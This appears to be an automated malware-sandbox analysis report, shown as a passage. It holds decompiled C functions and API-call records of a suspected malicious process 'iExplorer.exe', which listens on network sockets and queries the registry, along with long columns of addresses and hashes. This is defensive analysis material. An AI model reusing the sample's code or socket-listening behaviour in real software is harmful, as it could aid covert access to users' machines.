				 *((intOrPtr*)(_t50 + 0xc)) = 0;
				 *((intOrPtr*)(_t50 + 0x10)) = 0;
				 *((intOrPtr*)(_t50 + 0x14)) = 0;
				 *((intOrPtr*)(_t50 + 0x18)) = 0;
				 *((intOrPtr*)(_t50 + 0x1c)) = 0;
				 *_t50 = 0;
				_t21 = _t60 + 0x630; // 0x630
				_t51 = _t21;
				 *((intOrPtr*)(_t51 + 8)) = 0x20;
				 *_t51 = 0;
				 *((intOrPtr*)(_t51 + 0xc)) = 0;
				 *((intOrPtr*)(_t51 + 4)) = 0;
				 *((char*)(__edi + 0x52a)) = 0;
				_t26 = _t60 + 0x64c; // 0x64c
				 *((intOrPtr*)(__edi + 0x640)) = 0x412e80;
				E00A23549(_t26);
				 *((intOrPtr*)(__edi + 0x858)) = 0x413144;
				 *((intOrPtr*)(__edi + 0x86c)) = 0x4130f0;
				_t30 = _t60 + 0x870; // 0x870
				_t53 = _t30;
				 *_t53 = 0x4130f0;
				_t31 = _t60 + 0x878; // 0x878
				_t59 = _t31;
				 *_t59 = 0x413144;
				 *_t53 = 0x412f34;
				_t32 = _t60 + 0x87c; // 0x87c
				_t54 = _t32;
				 *__edi = 0x412e98;
				 *((intOrPtr*)(__edi + 0x1c8)) = 0x412f1c;
				 *((intOrPtr*)(__edi + 0x1e0)) = 0x413760;
				 *((intOrPtr*)(__edi + 0x640)) = 0x412f24;
				 *((intOrPtr*)(__edi + 0x858)) = 0x412f2c;
				 *((intOrPtr*)(__edi + 0x86c)) = 0x412f30;
				 *_t59 = 0x412f38;
				_t38 = _t60 + 0x890; // 0x890
				 *_t54 = 0x413bd8;
				 *((intOrPtr*)(_t54 + 8)) = 0;
				 *((intOrPtr*)(_t54 + 0x10)) = 0;
				 *((intOrPtr*)(_t54 + 4)) = 0;
				 *((intOrPtr*)(_t54 + 0xc)) = 0;
				E00A23549(_t38);
				 *((char*)(__edi + 0xb20)) = 0;
				 *((char*)(__edi + 0xc25)) = 0;
				 *((char*)(__edi + 0xd2a)) = 0;
				 *((char*)(__edi + 0xe2f)) = 0;
				 *((char*)(__edi + 0xa9c)) = 0;
				return __edi;
			}










                                                                      0x00a22e88
                                                                      0x00a22e8c
                                                                      0x00a22e93
                                                                      0x00a22e99
                                                                      0x00a22e9f
                                                                      0x00a22ea5
                                                                      0x00a22eab
                                                                      0x00a22eab
                                                                      0x00a22eb6
                                                                      0x00a22ebc
                                                                      0x00a22ec2
                                                                      0x00a22ec5
                                                                      0x00a22ec8
                                                                      0x00a22ecb
                                                                      0x00a22ece
                                                                      0x00a22ed1
                                                                      0x00a22ed7
                                                                      0x00a22ee1
                                                                      0x00a22ee1
                                                                      0x00a22ee7
                                                                      0x00a22eea
                                                                      0x00a22eed
                                                                      0x00a22ef0
                                                                      0x00a22ef3
                                                                      0x00a22ef6
                                                                      0x00a22ef9
                                                                      0x00a22efc
                                                                      0x00a22efe
                                                                      0x00a22efe
                                                                      0x00a22f04
                                                                      0x00a22f0b
                                                                      0x00a22f0d
                                                                      0x00a22f10
                                                                      0x00a22f13
                                                                      0x00a22f19
                                                                      0x00a22f1f
                                                                      0x00a22f29
                                                                      0x00a22f2e
                                                                      0x00a22f38
                                                                      0x00a22f42
                                                                      0x00a22f42
                                                                      0x00a22f48
                                                                      0x00a22f4e
                                                                      0x00a22f4e
                                                                      0x00a22f54
                                                                      0x00a22f5a
                                                                      0x00a22f60
                                                                      0x00a22f60
                                                                      0x00a22f66
                                                                      0x00a22f6c
                                                                      0x00a22f76
                                                                      0x00a22f80
                                                                      0x00a22f8a
                                                                      0x00a22f94
                                                                      0x00a22f9e
                                                                      0x00a22fa4
                                                                      0x00a22faa
                                                                      0x00a22fb0
                                                                      0x00a22fb3
                                                                      0x00a22fb6
                                                                      0x00a22fb9
                                                                      0x00a22fbc
                                                                      0x00a22fc1
                                                                      0x00a22fc7
                                                                      0x00a22fcd
                                                                      0x00a22fd3
                                                                      0x00a22fda
                                                                      0x00a22fe3

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000005.00000002.320628061.00000000009C0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000005.00000002.320869373.0000000000A42000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $/A$,/A$0/A$X7A$`7A
                                                                      • API String ID: 0-851144607
                                                                      • Opcode ID: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                      • Instruction ID: e0111944a10148795aabd4865a47a67b1f4a633f2d7cb1200b439f3e7dd4a68a
                                                                      • Opcode Fuzzy Hash: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                      • Instruction Fuzzy Hash: 1D4182B0655642EFC309CF2AC5846C1FBE0BB09314F95C2AFC46C9B221C7B4A565CF98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00A23021, Relevance: 6.3, Strings: 5, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00A23021(intOrPtr* __esi) {
				void* __edi;
				intOrPtr* _t20;
				void* _t24;

				_t20 = __esi + 0x878;
				 *__esi = 0x412e98;
				 *((intOrPtr*)(__esi + 0x1c8)) = 0x412f1c;
				 *((intOrPtr*)(__esi + 0x1e0)) = 0x413760;
				 *((intOrPtr*)(__esi + 0x640)) = 0x412f24;
				 *((intOrPtr*)(__esi + 0x858)) = 0x412f2c;
				 *((intOrPtr*)(__esi + 0x86c)) = 0x412f30;
				 *((intOrPtr*)(__esi + 0x870)) = 0x412f34;
				 *_t20 = 0x412f38;
				E00A23663(__esi + 0x890);
				 *((intOrPtr*)(__esi + 0x87c)) = 0x413bd8;
				E00A2D71D(__esi + 0x87c);
				 *_t20 = 0x413144;
				 *((intOrPtr*)(__esi + 0x870)) = 0x4130f0;
				E00A23663(__esi + 0x64c);
				E00A22FE4(__esi + 0x1c8, _t24);
				return E00A2744A(__esi);
			}






                                                                      0x00a23029
                                                                      0x00a23035
                                                                      0x00a2303b
                                                                      0x00a23041
                                                                      0x00a2304b
                                                                      0x00a23055
                                                                      0x00a2305f
                                                                      0x00a23069
                                                                      0x00a23073
                                                                      0x00a23079
                                                                      0x00a23084
                                                                      0x00a2308a
                                                                      0x00a2308f
                                                                      0x00a2309b
                                                                      0x00a230a5
                                                                      0x00a230aa
                                                                      0x00a230b8

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000005.00000002.320628061.00000000009C0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000005.00000002.320869373.0000000000A42000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $/A$,/A$0/A$4/A$`7A
                                                                      • API String ID: 0-2435369464
                                                                      • Opcode ID: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                      • Instruction ID: dc1a950633c852bbc28ee7ccbded789ebe96e95a9b1ba680f1584e951910242f
                                                                      • Opcode Fuzzy Hash: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                      • Instruction Fuzzy Hash: A7011DB5000B55CAD721EF24D2406C6BBF4FB45305F10C91FE4EA4B204DBB8A29ADF59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 009E9829, Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 88%
                                                                      			E009E9829(intOrPtr _a4, signed char* _a8, intOrPtr _a12, char _a16, signed int* _a20) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				void* __edi;
				void* __esi;
				signed int _t66;
				void* _t70;
				intOrPtr _t71;
				signed int _t74;
				signed int _t84;
				void* _t85;
				signed int _t94;
				signed int* _t95;
				signed int _t96;
				signed int* _t97;
				signed char* _t100;
				signed int _t101;
				signed char _t104;
				signed char* _t136;
				intOrPtr _t140;

				_t136 = _a8;
				_v20 = 0;
				_v8 = 0;
				_v12 = 1;
				_v16 = 0x4435dc;
				if(_t136 != 0) {
					_t101 =  *_t136 & 0x000000ff;
					if(_t101 == 0x84) {
						_t101 = _t136[0x23] & 0x000000ff;
					}
					if(_t101 != 0x9c) {
						L8:
						if(_t101 == 0x5e || _t101 == 0x82 || _t101 == 0x81) {
							_t140 = _a4;
							_t66 = E009E980E(_t140);
							_v8 = _t66;
							if(_t66 == 0) {
								goto L22;
							}
							if((_t136[2] & 0x00000400) == 0) {
								_push(_t136[4]);
								_t71 = E009DCE3A(0x44a3c8, _v16);
								_v20 = _t71;
								if(_t71 != 0) {
									_t129 = _v8;
									if(_v8 != 0) {
										E009E93C1(0x41315e, _t129, _t71, 1);
									}
									if(_t101 == 0x82) {
										 *((char*)(_v8 + 0x1e)) = 2;
									}
									L27:
									if(_t101 == 0x81 || _t101 == 0x82) {
										if(_a16 != 0x62) {
											goto L31;
										}
										_push(0x63);
										goto L32;
									} else {
										L31:
										_push(_a16);
										L32:
										E009EBE00(_v8);
										_t74 = _v8;
										if(( *(_t74 + 0x1c) & 0x0000000c) != 0) {
											 *(_t74 + 0x1c) =  *(_t74 + 0x1c) & 0x0000fffd;
										}
										goto L34;
									}
								}
								goto L22;
							}
							E009E9280(_v8, _t136[4] * _v12, _t136[4] * _v12 >> 0x20);
							goto L27;
						} else {
							if(_t101 != 0x9c) {
								if(_t101 != 0x83) {
									L36:
									 *_a20 = _v8;
									goto L37;
								}
								_t140 = _a4;
								_t84 = E009E980E(_t140);
								_v8 = _t84;
								if(_t84 == 0) {
									L22:
									 *((char*)(_t140 + 0x1e)) = 1;
									E009DC16B(_t140, _v20);
									E009E9A4C(_v8);
									 *_a20 =  *_a20 & 0x00000000;
									_t70 = 7;
									return _t70;
								}
								_t85 = E009DD157(_t136[4] + 2);
								asm("cdq");
								E009E93C1(0x41315e, _v8, E009DD801(_t140, 0x9c, _t136[4] + 2, _t85 - 1), 0);
								L17:
								L34:
								_t108 = _v8;
								if(_v8 != 0) {
									E009EBCAB(_t108);
								}
								goto L36;
							}
							L12:
							if(E009E9829(_a4, _t136[8], _a12, _a16,  &_v8) != 0) {
								goto L34;
							}
							E009E91BB(_v8);
							_t94 = _v8;
							_t95 = _t94 + 0x10;
							asm("adc edx, 0x0");
							 *_t95 =  ~( *_t95);
							_t95[1] =  ~( *(_t94 + 0x14));
							_t96 = _v8;
							_t97 = _t96 + 8;
							asm("adc edx, 0x0");
							 *_t97 =  ~( *_t97);
							_t97[1] =  ~( *(_t96 + 0xc));
							E009EBE00(_v8, _a16);
							goto L17;
						}
					}
					_t100 = _t136[8];
					_t104 =  *_t100;
					if(_t104 == 0x81 || _t104 == 0x82) {
						_v12 = _v12 | 0xffffffff;
						_t136 = _t100;
						_t101 =  *_t136 & 0x000000ff;
						_v16 = 0x44a3c4;
						goto L8;
					} else {
						goto L12;
					}
				} else {
					 *_a20 = 0;
					L37:
					return 0;
				}
			}
























                                                                      0x009e9834
                                                                      0x009e9839
                                                                      0x009e983c
                                                                      0x009e983f
                                                                      0x009e9846
                                                                      0x009e984d
                                                                      0x009e9859
                                                                      0x009e9862
                                                                      0x009e9864
                                                                      0x009e9864
                                                                      0x009e986f
                                                                      0x009e9890
                                                                      0x009e9893
                                                                      0x009e996d
                                                                      0x009e9970
                                                                      0x009e9977
                                                                      0x009e997a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x009e9982
                                                                      0x009e9998
                                                                      0x009e99a3
                                                                      0x009e99ad
                                                                      0x009e99b0
                                                                      0x009e99d4
                                                                      0x009e99d9
                                                                      0x009e99e6
                                                                      0x009e99ec
                                                                      0x009e99f3
                                                                      0x009e99f8
                                                                      0x009e99f8
                                                                      0x009e99fc
                                                                      0x009e9a02
                                                                      0x009e9a10
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x009e9a12
                                                                      0x00000000
                                                                      0x009e9a16
                                                                      0x009e9a16
                                                                      0x009e9a16
                                                                      0x009e9a19
                                                                      0x009e9a1c
                                                                      0x009e9a21
                                                                      0x009e9a29
                                                                      0x009e9a2b
                                                                      0x009e9a2b
                                                                      0x00000000
                                                                      0x009e9a29
                                                                      0x009e9a02
                                                                      0x00000000
                                                                      0x009e99b0
                                                                      0x009e998f
                                                                      0x00000000
                                                                      0x009e98b1
                                                                      0x009e98b3
                                                                      0x009e991e
                                                                      0x009e9a3d
                                                                      0x009e9a43
                                                                      0x00000000
                                                                      0x009e9a43
                                                                      0x009e9924
                                                                      0x009e9927
                                                                      0x009e992e
                                                                      0x009e9931
                                                                      0x009e99b2
                                                                      0x009e99b5
                                                                      0x009e99ba
                                                                      0x009e99c4
                                                                      0x009e99cc
                                                                      0x009e99d1
                                                                      0x00000000
                                                                      0x009e99d1
                                                                      0x009e993a
                                                                      0x009e9944
                                                                      0x009e9961
                                                                      0x009e9967
                                                                      0x009e9a31
                                                                      0x009e9a31
                                                                      0x009e9a36
                                                                      0x009e9a38
                                                                      0x009e9a38
                                                                      0x00000000
                                                                      0x009e9a36
                                                                      0x009e98b5
                                                                      0x009e98cf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x009e98d8
                                                                      0x009e98dd
                                                                      0x009e98e3
                                                                      0x009e98ed
                                                                      0x009e98f0
                                                                      0x009e98f4
                                                                      0x009e98f7
                                                                      0x009e98fd
                                                                      0x009e9904
                                                                      0x009e9909
                                                                      0x009e990b
                                                                      0x009e9911
                                                                      0x00000000
                                                                      0x009e9911
                                                                      0x009e9893
                                                                      0x009e9871
                                                                      0x009e9874
                                                                      0x009e9879
                                                                      0x009e9880
                                                                      0x009e9884
                                                                      0x009e9886
                                                                      0x009e9889
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x009e984f
                                                                      0x009e9852
                                                                      0x009e9a45
                                                                      0x00000000
                                                                      0x009e9a45

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000005.00000002.320628061.00000000009C0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000005.00000002.320869373.0000000000A42000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ^$^1A$^1A$b
                                                                      • API String ID: 0-1727528133
                                                                      • Opcode ID: d589e5707e4d6ea81bb9d68796acfbad06745d6c061f5ce9fd65735b0fa530f5
                                                                      • Instruction ID: d7a12745d958c58b1c032ebe26f77a95406c8678ea59c5a92040660aad731d2c
                                                                      • Opcode Fuzzy Hash: d589e5707e4d6ea81bb9d68796acfbad06745d6c061f5ce9fd65735b0fa530f5
                                                                      • Instruction Fuzzy Hash: 97610471A00285EFDF16CF6AC8817AD7BB5EF85310F248169E815AB392D735DE40CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: iExplorer.exe PID: 1352 Parent PID: 2432 iExplorer.exeCOMMON

                                                                      Executed Functions

                                                                      Function 04FD0F93, Relevance: 1.6, APIs: 1, Instructions: 81networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • bind.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD1027
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: bind
                                                                      • String ID:
                                                                      • API String ID: 1187836755-0
                                                                      • Opcode ID: 37d551dc0bc5ca85c61be3e7f82b5c987de620be8e403f9564f623d205ea2964
                                                                      • Instruction ID: f34109b26be4cf2fb7e66074b27866e714f5546f2172d08b50509e6d6601b56f
                                                                      • Opcode Fuzzy Hash: 37d551dc0bc5ca85c61be3e7f82b5c987de620be8e403f9564f623d205ea2964
                                                                      • Instruction Fuzzy Hash: 1F21A371509380AFE7128F65CC84F96BFB8EF46310F1884ABE944DF152D264A909CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD0A50, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • listen.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD0AE4
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: listen
                                                                      • String ID:
                                                                      • API String ID: 3257165821-0
                                                                      • Opcode ID: 9ffd0301635224dd9b57691321b06019993ad62f810d0d53575c19afbed8b4d7
                                                                      • Instruction ID: c8a6d0b7eb48c4e56b44c584fce0defb29facaa30e8400431146ea02e448f6f8
                                                                      • Opcode Fuzzy Hash: 9ffd0301635224dd9b57691321b06019993ad62f810d0d53575c19afbed8b4d7
                                                                      • Instruction Fuzzy Hash: 3F21B2B2409784AFE712CF54DC85F56BFA8EF46324F08849BE9449F193D274A905CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD0FC6, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • bind.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD1027
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: bind
                                                                      • String ID:
                                                                      • API String ID: 1187836755-0
                                                                      • Opcode ID: 4ef36db3b571db788360a97c960abc272ac74144bfc6afe698c709a8e90068d3
                                                                      • Instruction ID: 1e4ee2a7e93c0b0d0e85df526aed739ee8024828e4c76c2baf49f69d3e7ffb7f
                                                                      • Opcode Fuzzy Hash: 4ef36db3b571db788360a97c960abc272ac74144bfc6afe698c709a8e90068d3
                                                                      • Instruction Fuzzy Hash: 7911BF72900244AFEB20DF55DD84FA6FBACEF44720F18846BEE099B241D674A509CBB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD0A8E, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • listen.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD0AE4
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: listen
                                                                      • String ID:
                                                                      • API String ID: 3257165821-0
                                                                      • Opcode ID: 5c81bebe7a3dfbaa717489110247d3d288458aaf0f94e88b13a67dab2ad49018
                                                                      • Instruction ID: 9a30aab4b65601a223260482e509570c1e794402c1027634c9fab35b2f5dc158
                                                                      • Opcode Fuzzy Hash: 5c81bebe7a3dfbaa717489110247d3d288458aaf0f94e88b13a67dab2ad49018
                                                                      • Instruction Fuzzy Hash: 0F11E572504204AFEB11DF25DC84F6AFF98EF45324F1884ABEE44DB241D674A405CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02950D58, Relevance: 1.2, Instructions: 1179COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.251090689.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0e0633dee356d79868d76443dfde0b8cc7298aaeb4f64465c0a1cc419b59126a
                                                                      • Instruction ID: 58d596fc3b5b3fe29640b60bd153cb4ac06537f82df3cd3f440ad0c5bf2f3566
                                                                      • Opcode Fuzzy Hash: 0e0633dee356d79868d76443dfde0b8cc7298aaeb4f64465c0a1cc419b59126a
                                                                      • Instruction Fuzzy Hash: 85C2C974A00229CFDB64EF28C994BEDB7B2AF85305F1045E9D809AB394DB359E85CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 029503B0, Relevance: 2.8, Strings: 2, Instructions: 326COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.251090689.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :@:r$`5ar
                                                                      • API String ID: 0-3512261011
                                                                      • Opcode ID: 113b55b6cf034c9f987e9a608cd08a6d269dbeb6acd23b4c3462a336f22869a0
                                                                      • Instruction ID: 1c0bf4776476f5d3b776060d28bcc0a69b8cafe45b3c3d8b709c4bae84dab56b
                                                                      • Opcode Fuzzy Hash: 113b55b6cf034c9f987e9a608cd08a6d269dbeb6acd23b4c3462a336f22869a0
                                                                      • Instruction Fuzzy Hash: E0D1FB3170060ACFC714FB38D890A9A7FAAFF84715F508929E55A9F358DFB16906CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107B729, Relevance: 1.6, APIs: 1, Instructions: 120registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 0107B802
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      • Opcode ID: 32e94ab0c1043e9ecb1daba477c9fa5621e42402f06ee2349b5d512399c6827c
                                                                      • Instruction ID: 69f2e076bb86d57978f000d43bb5eb3cb5f543d37e0e39883c1171310eb5c9e0
                                                                      • Opcode Fuzzy Hash: 32e94ab0c1043e9ecb1daba477c9fa5621e42402f06ee2349b5d512399c6827c
                                                                      • Instruction Fuzzy Hash: 9F41282540E7C0AFD3139B358C65A61BFB4AF47620B0E81DBD9C4DF5A3D2286909C7B6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107B3E6, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LsaLookupSids.ADVAPI32(?,00000E2C), ref: 0107B4BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LookupSids
                                                                      • String ID:
                                                                      • API String ID: 2427636062-0
                                                                      • Opcode ID: aae256719d9cd15becb2538b51e643945da99043589db49e7cb9ebcf4a7df56a
                                                                      • Instruction ID: 1955dfd55ada0bf6108a4571130d52baf661195f451383b269e9eb8559162dc3
                                                                      • Opcode Fuzzy Hash: aae256719d9cd15becb2538b51e643945da99043589db49e7cb9ebcf4a7df56a
                                                                      • Instruction Fuzzy Hash: B1317072504344AFE722CB69CC44FAABFECEF45710F08899AE984DB152D724A908CB75
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107BBF3, Relevance: 1.6, APIs: 1, Instructions: 98fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0107BCA9
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 1fe79600488b3a31fb30ba8f4f7bdb4b51cdc2b70c83893a9034883b101d2ef9
                                                                      • Instruction ID: 01246883450fc5287c6d790e1163638c3633353551bd6d5ebd7685c607a59959
                                                                      • Opcode Fuzzy Hash: 1fe79600488b3a31fb30ba8f4f7bdb4b51cdc2b70c83893a9034883b101d2ef9
                                                                      • Instruction Fuzzy Hash: A7317EB2505384AFE722CF25DD44F62BFE8EF46614F08849AE9848B252D375E909CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD0D20, Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 04FD0DBF
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: a9b5b8aabb601cd2be7c8d4391b7ecb2bdcb4faad5cda1d788b8294d82c5b844
                                                                      • Instruction ID: bec8dd628d214cf8d253e51e168556485dec5bbc982b6fc78c1cece134a9ecfa
                                                                      • Opcode Fuzzy Hash: a9b5b8aabb601cd2be7c8d4391b7ecb2bdcb4faad5cda1d788b8294d82c5b844
                                                                      • Instruction Fuzzy Hash: A731A072504344AFEB228F65DC44F67BFACEF45720F0889AEF985DB152D224A819CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107AB26, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0107ABD5
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: 09d20902e686ab6c7969663cad7617985505f9c95b0ae99bf641ffe25db0d8e2
                                                                      • Instruction ID: 7f6856d61d323de4bb00df0a2b41ae802ac7ceeb24e63d3ec66a06b0ac4dd4b8
                                                                      • Opcode Fuzzy Hash: 09d20902e686ab6c7969663cad7617985505f9c95b0ae99bf641ffe25db0d8e2
                                                                      • Instruction Fuzzy Hash: 7631B4B2504384AFE7228B25CC45F67BFECEF06710F08849BED809B152D264A849CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107B426, Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LsaLookupSids.ADVAPI32(?,00000E2C), ref: 0107B4BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LookupSids
                                                                      • String ID:
                                                                      • API String ID: 2427636062-0
                                                                      • Opcode ID: 972aa561b3383f843b931ee60807c9bdd69f7170059dcbfd285e5f60c560d14c
                                                                      • Instruction ID: 7b27c32a7b39a89429dc1d9446ffcacd2a996627b0c5aa4931f20c1bbc0b7b95
                                                                      • Opcode Fuzzy Hash: 972aa561b3383f843b931ee60807c9bdd69f7170059dcbfd285e5f60c560d14c
                                                                      • Instruction Fuzzy Hash: C5215EB2900208AEEB21DF69DC84FABBBECEF44710F14895AEA84DB141D674A5048B75
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD1231, Relevance: 1.6, APIs: 1, Instructions: 90networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: accept
                                                                      • String ID:
                                                                      • API String ID: 3005279540-0
                                                                      • Opcode ID: 351a7d8f767f13251e70045f389dc7967b6f3a9f95b5f87dfa46f4781793a007
                                                                      • Instruction ID: 52ed65e627c8072ae3140928f5ff9a7ba3132cc19b72f6af71190299c4dc2390
                                                                      • Opcode Fuzzy Hash: 351a7d8f767f13251e70045f389dc7967b6f3a9f95b5f87dfa46f4781793a007
                                                                      • Instruction Fuzzy Hash: 49316FB1509780AFE712CF25DC45F96FFA8EF06314F08849AE9849B253D375A909CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD0C18, Relevance: 1.6, APIs: 1, Instructions: 90timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessTimes.KERNELBASE(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD0CB5
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ProcessTimes
                                                                      • String ID:
                                                                      • API String ID: 1995159646-0
                                                                      • Opcode ID: 8f8d51e7a96a430f3c38a97275c27fa0317903bf15b399cd16ee718919f764ec
                                                                      • Instruction ID: 902187e61cc8414ddd0af97618086727f205e4cdad279988211eb35c20df50d1
                                                                      • Opcode Fuzzy Hash: 8f8d51e7a96a430f3c38a97275c27fa0317903bf15b399cd16ee718919f764ec
                                                                      • Instruction Fuzzy Hash: BC31D5B2509380AFEB228F24DC45F96BFB8EF46314F0884DBE985DB193C225A905C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107AC1D, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
